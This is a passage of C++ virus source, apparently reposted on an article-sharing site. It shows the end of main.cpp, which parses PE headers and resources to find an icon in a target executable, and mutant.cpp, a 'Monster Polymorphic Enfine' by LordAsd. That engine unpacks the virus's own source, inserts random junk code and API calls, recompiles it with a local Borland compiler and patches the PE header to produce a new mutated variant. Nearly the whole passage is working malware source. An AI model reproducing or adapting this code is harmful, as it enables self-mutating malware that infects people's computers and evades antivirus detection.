if (readed!=sizeof(header)) { CloseHandle(h);; return x;; };;
w = *((WORD*)header);
switch (w)
{
case 0x454E : x = FILE_FORMAT_NE;; break;
case 0x4550 : x = FILE_FORMAT_PE;; break;
case 0x454C : x = FILE_FORMAT_LE;; break;
case 0x584C : x = FILE_FORMAT_LX;; break;
};;
CloseHandle(h);;
return x;;
}

/******************************************************************************/
/* RESOURCE PROCESSING */
/******************************************************************************/
DWORD located_addr;
bool TypeIcon;
DWORD delta;

//Declaration
LPVOID GetSectionPtr(PSTR name, PIMAGE_NT_HEADERS pNTHeader, DWORD imageBase)
{
PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader);;
for (unsigned i=0; i<pNTHeader->FileHeader.NumberOfSections; i++,section++)
{
if (strnicmp(section->Name,name,IMAGE_SIZEOF_SHORT_NAME)==0)
{
delta = section->PointerToRawData - section->VirtualAddress;;
return (LPVOID)(section->PointerToRawData + imageBase);;
};
};
return 0;;
};

void DumpResourceDirectory (PIMAGE_RESOURCE_DIRECTORY resDir,
DWORD resourceBase, DWORD level, DWORD resourceType);

//Declaration
void DumpResourceEntry( MY_PIMAGE_RESOURCE_DIRECTORY_ENTRY resDirEntry,
DWORD resourceBase, DWORD level)
{
UINT i;;
char nameBuffer[128];;
PIMAGE_RESOURCE_DATA_ENTRY pResDataEntry;;
if ( (resDirEntry->u2.OffsetToData) & IMAGE_RESOURCE_DATA_IS_DIRECTORY )
{
DumpResourceDirectory( (PIMAGE_RESOURCE_DIRECTORY)
((resDirEntry->u2.OffsetToData & 0x7FFFFFFF) + resourceBase),
resourceBase, level, resDirEntry->u.Name);;
return;;
};;
pResDataEntry = (PIMAGE_RESOURCE_DATA_ENTRY)
(resourceBase + resDirEntry->u2.OffsetToData);;
if (TypeIcon&&(located_addr==0)&&(pResDataEntry->Size==744))
located_addr=pResDataEntry->OffsetToData+delta;;
};;
//Declaration
void DumpResourceDirectory(PIMAGE_RESOURCE_DIRECTORY resDir,DWORD resourceBase,
DWORD level, DWORD resourceType)
{
MY_PIMAGE_RESOURCE_DIRECTORY_ENTRY resDirEntry;;
UINT i;;
TypeIcon = (resourceType==1)||(resourceType==3);;
resDirEntry = (MY_PIMAGE_RESOURCE_DIRECTORY_ENTRY)(resDir+1);;
for ( i=0; i < resDir->NumberOfNamedEntries; i++, resDirEntry++ )
DumpResourceEntry(resDirEntry, resourceBase, level+1);;
for ( i=0; i < resDir->NumberOfIdEntries; i++, resDirEntry++ )
DumpResourceEntry(resDirEntry, resourceBase, level+1);;
};;

//Declaration
void DumpResourceSection(DWORD base, PIMAGE_NT_HEADERS pNTHeader)
{
PIMAGE_RESOURCE_DIRECTORY resDir;;
resDir = (PIMAGE_RESOURCE_DIRECTORY) GetSectionPtr(".rsrc", pNTHeader, (DWORD)base);;
if ( !resDir ) return;;
DumpResourceDirectory(resDir,(DWORD)resDir,0,0);;
};
//Declaration
DWORD FindIcon(char* TargetName)
{
located_addr = 0;;
PIMAGE_DOS_HEADER dosHeader;;
HANDLE hFile = CreateFile(TargetName,GENERIC_READ, FILE_SHARE_READ,NULL,
OPEN_EXISTING,0,NULL);;
if ( hFile == INVALID_HANDLE_VALUE ) return 0;;
HANDLE hFileMapping = CreateFileMapping(hFile,NULL,PAGE_READONLY,0,0,NULL);;
if ( hFileMapping == 0 ) {CloseHandle(hFile);; return 0;; };;
LPVOID lpFileBase = MapViewOfFile(hFileMapping,FILE_MAP_READ,0,0,0);;
if ( lpFileBase == 0 )
{CloseHandle(hFileMapping);; CloseHandle(hFile);; return 0;; };;
if ((*((WORD*)lpFileBase))!=0x5A4D)
{
UnmapViewOfFile(lpFileBase);; CloseHandle(hFileMapping);;
CloseHandle(hFile);; return 0;;
};;
PIMAGE_NT_HEADERS pNTHeader;;
DWORD base = (DWORD)lpFileBase;;
WORD hru = *((WORD*)((DWORD)(lpFileBase)+0x3C));;
pNTHeader = (PIMAGE_NT_HEADERS)(DWORD(lpFileBase)+hru);;

DumpResourceSection(base,pNTHeader);;

UnmapViewOfFile(lpFileBase);;
CloseHandle(hFileMapping);;
CloseHandle(hFile);;
return located_addr;;
}
------------------------------------------------------------------[main.cpp]--
----------------------------------------------------------------[mutant.cpp]--
// Monster Polymorphic Enfine [MPE] by LordAsd
// for BC++ for Win32 version 4.5 / 5.01

#include "winapp32.h"

#define PACKED_FILE_LAST 1
#define PACKED_FILE_NOT_LAST 0
#define MAX_FUNCTIONS 13
#define MAX_VARS 50

//Declaration
struct TArcFileRec
{
UINT Last;
UINT Size;
char Name[15];
}/*Separator*/;


#define MAX_TRASH_INDEX 30
typedef char String[MAX_PATH];
char PM_TempDir[MAX_PATH];
char PM_Prefix[]="????";
int GenIndex = 0;

String PM_Trash[MAX_TRASH_INDEX];

int PM_CurrIndex = -1;

//Declaration
void GetID(char* ss)
{
GenIndex++;;
sprintf(ss,"_%s%04X",PM_Prefix,GenIndex);;
};

//Declaration
void PM_AddToTrash(char* ss)
{
if (PM_CurrIndex==(MAX_TRASH_INDEX-1)) { Log("ERROR"); return;;};
PM_CurrIndex++;;
strcpy(PM_Trash[PM_CurrIndex],ss);;
};
//Declaration
bool PM_GetFromList(int num, char* ss)
{
if (num>PM_CurrIndex) return false;;
strcpy(ss,PM_Trash[num]);;
return true;;
};

//Declaration
bool PM_Init()
{
if (SrcPtr==NULL) return false;;
sprintf(PM_Prefix,"%04X",random(0xFFFF));;
return GetTempDir(PM_TempDir);;
};
//Declaration
void PM_Cleanup()
{
if (LogfingEnabled) return;;
int x = 0;;
String Name;;
char Drive[MAX_PATH];;
char Dir[MAX_PATH];;
char FName[MAX_PATH];;
char Ext[MAX_PATH];;

while (PM_GetFromList(x,Name))
{
fnsplit(Name,Drive,Dir,FName,Ext);;
DeleteFile(Name);;
sprintf(Name,"%s%s%s.OBJ",Drive,Dir,FName);;
DeleteFile(Name);;
x++;;
};;
};
//Declaration
bool PM_FileAvailable(char* Name, DWORD size)
{
char ss[MAX_PATH+666];;
strcpy(ss,BCRoot);;
strcat(ss,Name);;
HANDLE h1 = CreateFile(ss,GENERIC_READ,FILE_SHARE_READ,NULL,
OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) return false;;
DWORD rsize = SetFilePointer(h1,0,NULL,FILE_END);;
CloseHandle(h1);;
if (abs(rsize-size)>50000) return false;;
return true;;
};
//Declaration
bool PM_AllFilesAvailable()
{
bool x1 = true;;
bool x2 = true;;
if (!PM_FileAvailable("\\BIN\\BCC32.EXE", 626688)) x1 = false;;
if (!PM_FileAvailable("\\BIN\\MAKE.EXE", 90112)) x1 = false;;
if (!PM_FileAvailable("\\BIN\\TDSTRP32.EXE", 45056)) x1 = false;;
if (!PM_FileAvailable("\\BIN\\COMPRESS.EXE", 15259)) x1 = false;;

if (!PM_FileAvailable("\\BIN\\BCC32.EXE", 675840)) x2 = false;;
if (!PM_FileAvailable("\\BIN\\BRC32.EXE", 47684)) x2 = false;;
if (!PM_FileAvailable("\\BIN\\TLINK32.EXE", 180224)) x2 = false;;
if (!PM_FileAvailable("\\BIN\\COMPRESS.EXE", 15259)) x2 = false;;

return (x1 || x2);;
};
//Declaration
bool PM_Unpack()
{
char src_name[MAX_PATH];;
strcpy(src_name,PM_TempDir);;
strcat(src_name,"\\WINAPP32.LZZ");;
PM_AddToTrash(src_name);;
HANDLE h1 = CreateFile(src_name,GENERIC_WRITE,0,NULL,CREATE_NEW,0,0);;
if (h1==INVALID_HANDLE_VALUE) return false;;
DWORD written;;
WriteFile(h1,SrcPtr,SSize,&written,NULL);;
CloseHandle(h1);;
if (written!=SSize) return false;;
OFSTRUCT lz_fdata;;
OFSTRUCT lz_fdata2;;
char dest_name[MAX_PATH];;
strcpy(dest_name,PM_TempDir);;
strcat(dest_name,"\\WINAPP32.LZX");;
PM_AddToTrash(dest_name);;
INT lz_src = LZOpenFile(src_name,&lz_fdata,OF_READ);;
if (lz_src<0) return false;;
INT lz_dest = LZOpenFile(dest_name,&lz_fdata2,OF_CREATE);;
LONG check = LZCopy(lz_src,lz_dest);;
LZClose(lz_src);;
LZClose(lz_dest);;
if (check<0) return false;;
DeleteFile(src_name);;
h1 = CreateFile(dest_name,GENERIC_READ,0,NULL,OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) return false;;
TArcFileRec FInfo;;
FInfo.Last = PACKED_FILE_NOT_LAST;;
while (FInfo.Last==PACKED_FILE_NOT_LAST)
{
DWORD readed;;
ReadFile(h1,&FInfo,sizeof(FInfo),&readed,NULL);;
if (readed!=sizeof(FInfo)) {CloseHandle(h1);; return false;;};;
char Name[MAX_PATH];;
sprintf(Name,"%s\\%s",PM_TempDir,FInfo.Name);;
PM_AddToTrash(Name);;
HANDLE h2 = CreateFile(Name,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,0);;
if (h2==INVALID_HANDLE_VALUE) {CloseHandle(h1);; return false;;};;
void* shit = malloc(FInfo.Size);;
ReadFile(h1,shit,FInfo.Size,&readed,NULL);;
DWORD written;;
WriteFile(h2,shit,FInfo.Size,&written,NULL);;
CloseHandle(h2);;
if ((readed!=FInfo.Size)||(written!=FInfo.Size))
{CloseHandle(h1);; return false;;};;
free(shit);;
};; // While not last file
CloseHandle(h1);;
return true;;
};

//Declaration
void CreatePragma(char* s)
{
strcpy(s,"");;
#pragma message "Function not implemented"
};

struct TFuncRec
{
char ID[10];
char RetType[MAX_TYPE_ID_LENGTH];
bool VoidRet;
};
int FuncIndex = -1;
TFuncRec FuncData[MAX_FUNCTIONS];

struct TVarRec
{
char ID[10];
char Type[MAX_TYPE_ID_LENGTH];
};
int VarIndex = -1;
TVarRec VarData[MAX_VARS];

//Declaration // this one returns VarIndex for new variable, or -1 if fault
int DeclareVar(HANDLE h,char* type)
{
if (VarIndex==(MAX_VARS-1))
{Log("ERROR"); return -1;;};;
VarIndex++;;
char s[MAX_LINE];;
GetID(VarData[VarIndex].ID);;
strcpy(VarData[VarIndex].Type,type);;
sprintf(s,"%s %s;",type,VarData[VarIndex].ID);;
Writeln(h,s);;
return 0;;
};

//Declaration
void GenAriAssign(HANDLE h)
{
char t[3];;
char ss[MAX_LINE];;
int x = random(N_TYPES);;
strcpy(t,Types[x].sh);;
if (Types[x].ari!=1) // Invalid type for ari operations
{
if (stricmp(t,"ch")==0) return;;
sprintf(ss,"XX%s%u = XX%s%u; %s",t,random(3),t,random(3),MUT);;
Writeln(h,ss);;
return;;
};;
char aa[100];;
sprintf(ss,"%s XX%s%u = 1 ",MUT,t,random(4));;
for (int i=0; i<random(4)+1; i++)
{
strcat(ss,ari_op[random(N_ARI_OP)]);;
switch (random(3))
{
case 0 :
sprintf(aa,"%u",random(100));;
break;
default :
sprintf(aa,"XX%s%u",t,random(4));;
};; //switch
strcat(ss,aa);;
};;//for
strcat(ss,";");;
Writeln(h,ss);;
};
//Declaration
void GenApiCall(HANDLE h)
{
TApiCallRec This = ApiCallData[random(N_API_CALLS)];;
char s[MAX_LINE],ss[MAX_LINE];;
strcpy(s,"");;
if (!This.RetVoid) sprintf(s,"XX%s%u = ",This.ret_type,random(4));;
sprintf(ss,"%s(",This.name);;
strcat(s,ss);;
for (int i=0; i<This.num_params; i++)
{
sprintf(ss,"XX%s%u",This.params[i],random(4));;
strcat(s,ss);;
if (i!=(This.num_params-1)) strcat(s,",");;
};;//For
strcat(s,");");;
strcat(s,MUT);;
Writeln(h,s);;
};


//Declaration
void GenAnyCode(HANDLE h)
{
char foo[5]="{;";;
strcat(foo,";");;
Writeln(h,foo);;
for (int i=0; i<random(5); i++)
{
switch (random(10))
{
case 0 :
case 1 :
case 2 :
DeclareVar(h,Types[random(N_TYPES)].lo);; break;
case 3 :
case 4 :
case 5 :
GenAriAssign(h);; break;
case 6 :
case 7 :
case 8 :
GenApiCall(h);; break;
};; //switch
};;
foo[0] = '}';
Writeln(h,foo);;
};;
//Declaration

void DeclareFunction(HANDLE h)
{
char ss[100];;
if (FuncIndex==(MAX_FUNCTIONS-1)) return;;
FuncIndex++;;
FuncData[FuncIndex].VoidRet = true;;
GetID(FuncData[FuncIndex].ID);;
strcpy(FuncData[FuncIndex].RetType,"void");;
Writeln(h,PM_Declare);;
sprintf(ss,"inline %s",MUT);;
if (random(13)==0) Writeln(h,ss);;
sprintf(ss,"%s %s()",FuncData[FuncIndex].RetType,FuncData[FuncIndex].ID);;
Writeln(h,ss);;
GenAnyCode(h);;
};
//Declaration
void ProcessTextFile(char* Name1, char* Name2)
{
FuncIndex = -1;;
VarIndex = -1;;
char ss[MAX_LINE];;
HANDLE h1 = CreateFile(Name1,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) return;;
HANDLE h2 = CreateFile(Name2,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,0);;
if (h2==INVALID_HANDLE_VALUE) {CloseHandle(h1);; return;;};;
char s[MAX_LINE];;
while (Readln(h1,s))
{
// Mutation
if (random(100)==0) { CreatePragma(ss);; Writeln(h2,ss);;};;
if ((strstr(s,PM_Declare)!=NULL)&&(random(13)==0)) DeclareFunction(h2);;
if ((strstr(s,PM_EndLine)!=NULL)&&(random(100)==0)&&(strlen(s)<200))
{
strcpy(ss,strstr(s,PM_EndLine));;
*(strstr(s,PM_EndLine)+2)='\0';;
Writeln(h2,s);;
GenAnyCode(h2);;
strcpy(s,ss);;
};;
// Original line
Writeln(h2,s);;
};;
Writeln(h2,s);;
CloseHandle(h1);;
CloseHandle(h2);;
return;;
};
//Declaration
void PM_AddSource(char* AddName,char* TargetName,int status)
{
HANDLE h1 = CreateFile(AddName,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0);;
HANDLE h2 = CreateFile(TargetName,GENERIC_READ,0,NULL,OPEN_EXISTING,0,0);;
if ((h1==INVALID_HANDLE_VALUE)||(h2==INVALID_HANDLE_VALUE)) return;;
TArcFileRec FInfo;;
SetFilePointer(h1,0,NULL,FILE_END);;
FInfo.Size = SetFilePointer(h2,0,NULL,FILE_END);;
SetFilePointer(h2,0,NULL,FILE_BEGIN);;
FInfo.Last = status;;
char Drive[MAX_PATH];;
char Dir[MAX_PATH];;
char Name[MAX_PATH];;
char Ext[MAX_PATH];;
fnsplit(TargetName,Drive,Dir,Name,Ext);;
strcpy(FInfo.Name,Name);;
strcat(FInfo.Name,Ext);;
void* buf = malloc(FInfo.Size);;
DWORD readed = 0;;
WriteFile(h1,&FInfo,sizeof(FInfo),&readed,NULL);;
ReadFile(h2,buf,FInfo.Size,&readed,NULL);;
WriteFile(h1,buf,FInfo.Size,&readed,NULL);;
CloseHandle(h1);;
CloseHandle(h2);;
free(buf);;
return;;
};

//Declaration
void PermutationEnfine()
{
// Check if all OK
if (BadImage) return;;
if (Permutated) return;;
Permutated = true;; // Only one (no more than one) attempt during session
if (!PM_Init()) return;;
if (!PM_AllFilesAvailable()) return;;

// Unpack sources
if (!PM_Unpack()) {PM_Cleanup();;return;;};;
// CPP files mutation
int x = 0;;
String Name;;
char CurrName[MAX_PATH];;
strcpy(CurrName,PM_TempDir);;
strcat(CurrName,"\\CURRENT.MUT");;
PM_AddToTrash(CurrName);;
while (PM_GetFromList(x,Name))
{
if (stricmp(Ext(Name),".CPP")==0)
{
MoveFile(Name,CurrName);;
ProcessTextFile(CurrName,Name);;
DeleteFile(CurrName);;
}; // .CPP extension
x++;;
};
sprintf(Name,"%s\\BCCW32.CFG",PM_TempDir);;
PM_AddToTrash(Name);;
sprintf(Name,"%s\\WINAPP32.RES",PM_TempDir);;
PM_AddToTrash(Name);;

// Makefile processing
sprintf(Name,"%s\\WINAPP32.MAK",PM_TempDir);;
HANDLE h1 = CreateFile(Name,GENERIC_READ,0,NULL,OPEN_ALWAYS,0,0);;
sprintf(Name,"%s\\THIS_ONE.MAK",PM_TempDir);;
PM_AddToTrash(Name);;
HANDLE h2 = CreateFile(Name,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,0);;
if ((h1==INVALID_HANDLE_VALUE)||(h2==INVALID_HANDLE_VALUE))
{ PM_Cleanup();; return;; };;
DWORD size = SetFilePointer(h1,0,NULL,FILE_END);;
char* foo = (char* )malloc(size);;
char* zu = foo;;
SetFilePointer(h1,0,NULL,FILE_BEGIN);;
DWORD bar;;
ReadFile(h1,foo,size,&bar,NULL);;
for (int i=0; i<size; i++)
{
if ((*foo)=='^')
WriteFile(h2,&BCRoot,strlen(BCRoot),&bar,NULL);
else
WriteFile(h2,foo,1,&bar,NULL);;
foo++;;
};
CloseHandle(h1);;
CloseHandle(h2);;
free(zu);;
// 1st compilation

char ex[MAX_PATH];;
char Strip[MAX_PATH];;
char Target[MAX_PATH];;

sprintf(Target,"%s\\WINAPP32.EXE",PM_TempDir);;
sprintf(ex,"%s\\BIN\\MAKE.EXE -f %s\\THIS_ONE.MAK ",BCRoot,PM_TempDir);;
sprintf(Strip,"%s\\BIN\\TDSTRP32.EXE %s",BCRoot,Target);;
PM_AddToTrash(Target);;

if (!Exec(ex,PM_TempDir)) { PM_Cleanup();; return;; };;
if (!Exec(Strip,PM_TempDir)) {PM_Cleanup();; return;; };;

// 1st compile result check

h1 = CreateFile(Target,GENERIC_READ,0,NULL,OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) { PM_Cleanup();; return;; };;
DWORD TargetSize = SetFilePointer(h1,0,NULL,FILE_END);;
CloseHandle(h1);;

// Process sources, build archive and compress it

x=0;;
char Solid[MAX_PATH];;
sprintf(Solid,"%s\\WINAPP32.SRX",PM_TempDir);;
PM_AddToTrash(Solid);;
while (PM_GetFromList(x,Name))
{
if (stricmp(Ext(Name),".CPP")==0) PM_AddSource(Solid,Name,PACKED_FILE_NOT_LAST);;
x++;;
};;
sprintf(Name,"%s\\WINAPP32.MAK",PM_TempDir);;
PM_AddSource(Solid,Name,PACKED_FILE_NOT_LAST);;
sprintf(Name,"%s\\WINAPP32.DEF",PM_TempDir);;
PM_AddSource(Solid,Name,PACKED_FILE_NOT_LAST);;
sprintf(Name,"%s\\WINAPP32.RC",PM_TempDir);;
PM_AddSource(Solid,Name,PACKED_FILE_NOT_LAST);;
sprintf(Name,"%s\\WINAPP32.H",PM_TempDir);;
PM_AddSource(Solid,Name,PACKED_FILE_LAST);;

char Compressed[MAX_PATH];;
sprintf(Compressed,"%s\\WINAPP32.SRN",PM_TempDir);;
PM_AddToTrash(Compressed);;
char ss[MAX_PATH+666];;
sprintf(ss,"%s\\BIN\\COMPRESS.EXE %s %s",BCRoot,Solid,Compressed);;
if (!Exec(ss,PM_TempDir)) {PM_Cleanup();; return;; };;
h1 = CreateFile(Compressed,GENERIC_READ,0,NULL,OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) {PM_Cleanup();; return;; };;
DWORD SrcSize = SetFilePointer(h1,0,NULL,FILE_END);;
CloseHandle(h1);;
// Update WINAPP32.H to new sizes
char WinApp32h[MAX_PATH];;
char NewWinApp32h[MAX_PATH];;
sprintf(WinApp32h,"%s\\WINAPP32.H",PM_TempDir);;
sprintf(NewWinApp32h,"%s\\HEADER.NEW",PM_TempDir);;
h1 = CreateFile(WinApp32h,GENERIC_READ,0,NULL,OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) { PM_Cleanup();; return;; };;
h2 = CreateFile(NewWinApp32h,GENERIC_WRITE,0,NULL,CREATE_NEW,0,0);;
if (h1==INVALID_HANDLE_VALUE) { PM_Cleanup();; return;; };;
char s[MAX_LINE];;
while (Readln(h1,s))
{
if (strstr(s,vs_const)!=NULL)
sprintf(s,"DWORD VSize = %u; const char vs_const[]=\"%s\";",TargetSize,vs_const);;
if (strstr(s,ss_const)!=NULL)
sprintf(s,"DWORD SSize = %u; const char ss_const[]=\"%s\";",SrcSize,ss_const);;
Writeln(h2,s);;
};;
Writeln(h2,s);;
CloseHandle(h1);;
CloseHandle(h2);;
DeleteFile(WinApp32h);;
MoveFile(NewWinApp32h,WinApp32h);;

// 2nd compile

DeleteFile(Target);;
while (PM_GetFromList(x,Name))
{
if (stricmp(Ext(Name),".OBJ")==0) DeleteFile(Name);;
x++;;
};;

if (!Exec(ex,PM_TempDir)) { PM_Cleanup();; return;; };;
if (!Exec(Strip,PM_TempDir)) { PM_Cleanup();; return;; };;

// 2nd compile result check

h1 = CreateFile(Target,GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,0);;
if (h1==INVALID_HANDLE_VALUE) { PM_Cleanup();; return;; };;
DWORD CheckSize = SetFilePointer(h1,0,NULL,FILE_END);;
if (CheckSize!=TargetSize) {CloseHandle(h1); PM_Cleanup();; return;; };;
BadImage = true;;
SetFilePointer(h1,0,NULL,FILE_BEGIN);;
free(VPtr);;
VSize = TargetSize;;
VPtr = malloc(VSize);;
DWORD readed = 0;;
DWORD written;;
ReadFile(h1,VPtr,VSize,&readed,NULL);;
char* hru = (char*)VPtr;;
DWORD ii = (*(hru+0x3C)) + (*(hru+0x3D))*0x100;;
if ( ((*(hru+ii))!='P')&&((*(hru+ii+1))!='E'))
{ CloseHandle(h1);; PM_Cleanup();; return;; };;
*(hru+ii-2) = 'L';;
*(hru+ii-1) = 'A';;

// Link, replacing new source

h2 = CreateFile(Compressed,GENERIC_READ,0,NULL,OPEN_EXISTING,0,0);;
free(SrcPtr);;
SrcPtr = malloc(SrcSize);;
SSize = SrcSize;;
ReadFile(h2,SrcPtr,SrcSize,&readed,NULL);;
CloseHandle(h1);;
CloseHandle(h2);;
if (readed!=SrcSize) { PM_Cleanup();; return;; };;
BadImage = false;;
DeleteFile(Target);;
PM_Cleanup();;
};

//Declaration


----------------------------------------------------------------[mutant.cpp]--

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT